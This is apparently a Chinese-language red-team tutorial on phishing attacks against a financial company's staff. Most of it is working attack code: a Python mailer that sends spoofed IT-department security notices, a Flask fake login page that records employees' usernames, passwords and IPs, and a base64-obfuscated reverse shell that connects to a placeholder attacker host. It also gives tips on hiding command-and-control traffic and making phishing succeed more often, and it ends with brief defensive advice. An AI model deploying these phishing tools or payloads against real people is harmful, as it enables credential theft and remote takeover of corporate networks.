一、社工铓鱼攻击的核心思路
有一次,我接到一个模拟渗透测试任务,目标是攻破一家金融企业的内部网络。经过前期侦察,我发现该企业的外部防护措施异常严密,传统漏洞利用的可能性极低。但企业员工的信息泄露却非常严重,比如大量员工的邮箱地址能在社交媒体、公司官网以及某些泄露数据库里找到。这让我瞬间想到一个非常实用的攻击思路:社工铓鱼攻击。
社工铓鱼攻击本质上是一种心理层面的漏洞利用,它通过伪装成可信内容,诱导目标用户执行恶意操作,比如点击恶意链接、下载和运行载荷、输入敏感信息等。换句话说,你不需要直接攻破防火墙或漏洞,而是通过人的信任链打开通往内网的大门。这个思路在红队实战中非常吃香。
以下,我会结合自己实战中的经验,深入讲解如何一步步发起一次高效的社工铓鱼攻击,包括技术实现、免杀技巧以及绕过检测的具体方法。
---
二、环境搭建:钓鱼邮件与恶意网站
在实战中,我习惯先搭建一个钓鱼邮件发送系统和一个伪装的恶意网站。这样可以从邮件入口诱导目标,同时通过网站获取进一步的行为数据或者载荷执行。
钓鱼邮件发送器搭建
钓鱼邮件的核心在于伪造发件人地址和构造诱导性内容。这里我用 Python 的 smtplib 库快速构建一个发送器。邮件内容会伪装成公司内部公告,并嵌入一个恶意链接。
<pre><code class="language-python">import smtplib from email.mime.text import MIMEText from email.header import Header
SMTP服务器配置
smtp_server = "smtp.example.com" smtp_port = 587 smtp_user = "[email protected]" # 伪造的发件人 smtp_pass = "yourpassword" # SMTP认证密码
构造邮件内容
def send_phishing_email(target_email, phishing_url): msg = MIMEText(f""" 尊敬的员工您好,
公司IT部门近期发现了潜在的安全问题,请您立即点击以下链接进行账户安全检查: <a href="{phishing_url}">{phishing_url}</a>
如果您未完成检查,您的账户将有可能被限制访问。
谢谢您的配合。 """, 'html', 'utf-8') msg['From'] = Header("公司IT支持部门", 'utf-8') # 发件人名称 msg['To'] = Header("员工", 'utf-8') # 收件人名称 msg['Subject'] = Header("账户安全检查通知", 'utf-8')
发送邮件
try: server = smtplib.SMTP(smtp_server, smtp_port) server.starttls() server.login(smtp_user, smtp_pass) server.sendmail(smtp_user, [target_email], msg.as_string()) server.quit() print(f"[+] 钓鱼邮件发送成功: {target_email}") except Exception as e: print(f"[-] 邮件发送失败: {e}")
目标邮箱列表和钓鱼链接
target_emails = ["[email protected]", "[email protected]"] phishing_url = "http://malicious-site.com"
for email in target_emails: send_phishing_email(email, phishing_url)</code></pre>
恶意网站伪装与数据捕获
钓鱼邮件的恶意链接需要指向一个伪装的钓鱼网站。我用 Flask 快速启动一个网站,网站会伪装成登录页面,捕获用户输入的账号密码,同时记录访问IP。
<pre><code class="language-python">from flask import Flask, request, render_template import logging
app = Flask(__name__)
日志记录,用于保存用户输入的账号密码
logging.basicConfig(filename='credentials.log', level=logging.INFO)
@app.route("/", methods=["GET", "POST"]) def phishing_site(): if request.method == "POST": username = request.form.get("username") password = request.form.get("password") ip = request.remote_addr
保存记录到日志文件
logging.info(f"IP: {ip}, Username: {username}, Password: {password}") return "登录失败,请检查您的账户信息!"
返回伪装的登录页面
return """ <html> <body> <h2>公司账户登录</h2> <form method="POST"> 用户名: <input type="text" name="username"><br> 密码: <input type="password" name="password"><br> <button type="submit">登录</button> </form> </body> </html> """
if __name__ == "__main__": app.run(host="0.0.0.0", port=8080)</code></pre>
代码完成后,把钓鱼网站部署到一个云服务器,比如 AWS 或 DigitalOcean,绑定域名后即可投入实际使用。
---
三、Payload构造的艺术:绕过杀软与AV检测
在实际攻击中,仅捕获登录凭据往往还不够。为了进一步拿到内网权限,我会在钓鱼网站中植入一个恶意载荷,比如 Windows 下的远控程序。问题是,这些载荷往往会被杀软检测到,因此必须通过免杀技巧绕过。
载荷免杀思路
我常用的方法是将载荷进行加壳混淆,避免静态签名检测。同时,将恶意代码内存加载运行,减少硬盘上的留存痕迹。
以下是一个简单的 Python 脚本,用于生成免杀的可执行文件。载荷的核心功能是连接攻击者的 C2,执行命令。
<pre><code class="language-python">import base64
恶意载荷(示例为反向Shell)
payload = """ import socket, subprocess, os s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('attacker-ip', 4444)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) subprocess.call(['/bin/bash', '-i']) """
加壳:Base64编码载荷
encoded_payload = base64.b64encode(payload.encode()).decode()
解码后执行的脚本
stub = f""" import base64, exec payload = base64.b64decode("{encoded_payload}").decode() exec(payload) """
保存为恶意脚本文件
with open("malicious.py", "w") as f: f.write(stub)
print("[+] 恶意脚本生成完成:malicious.py")</code></pre>
生成的 malicious.py 是一个简单的免杀反向 Shell脚本。可以进一步使用工具如 PyInstaller 将其打包为可执行文件。
---
四、如何隐匿C2流量:伪装与对抗
搭建 C2 时,流量隐匿非常重要,否则容易被安全设备拦截。我常用两种方式来伪装流量:
利用 HTTPS 加密流量
通过 LetsEncrypt 申请免费证书,为 C2服务器启用 HTTPS。这可以隐藏流量内容,防止被 IDS/IPS检测。
模仿合法协议流量
将 C2通信伪造成合法协议的流量,比如 DNS 或 HTTP,攻击者的命令会嵌入到伪造的 DNS 查询或响应中,避免被防火墙拦截。
---
五、个人经验:如何提高钓鱼成功率
在多次实战中,我发现以下策略可以显著提高钓鱼的成功率:
- 邮件内容真实感高:伪造公司内部通知时,尽量模仿目标公司的语言风格。
- 定时发送:选择目标员工工作的时间段发送邮件,比如上午9点到下午5点。
- 多样化攻击载荷:不仅仅依赖单一钓鱼网站,还可以在邮件中嵌入恶意文件。
---
六、检测与防御:攻防视角的总结
虽然本文是从攻击者视角分析社工铓鱼技术,但作为渗透测试人员,我们也有责任帮助企业构建防御体系。以下是针对社工铓鱼攻击的防御建议:
- 邮件网关过滤:配置反钓鱼规则,拦截伪造的发件人和钓鱼链接。
- 员工安全培训:定期强化员工的安全意识,教导他们识别钓鱼邮件。
- 多因子认证:即使凭据被窃取,拥有 MFA 的账户也很难被入侵。
---
写到这里,关于社工铓鱼攻击的整个流程已经基本完成。从信息收集到载荷免杀,从 C2隐匿到最终数据捕获,这是一条完整的攻击链。希望这篇文章能帮助你更深刻地理解攻击者的思维,同时为防守工作提供参考。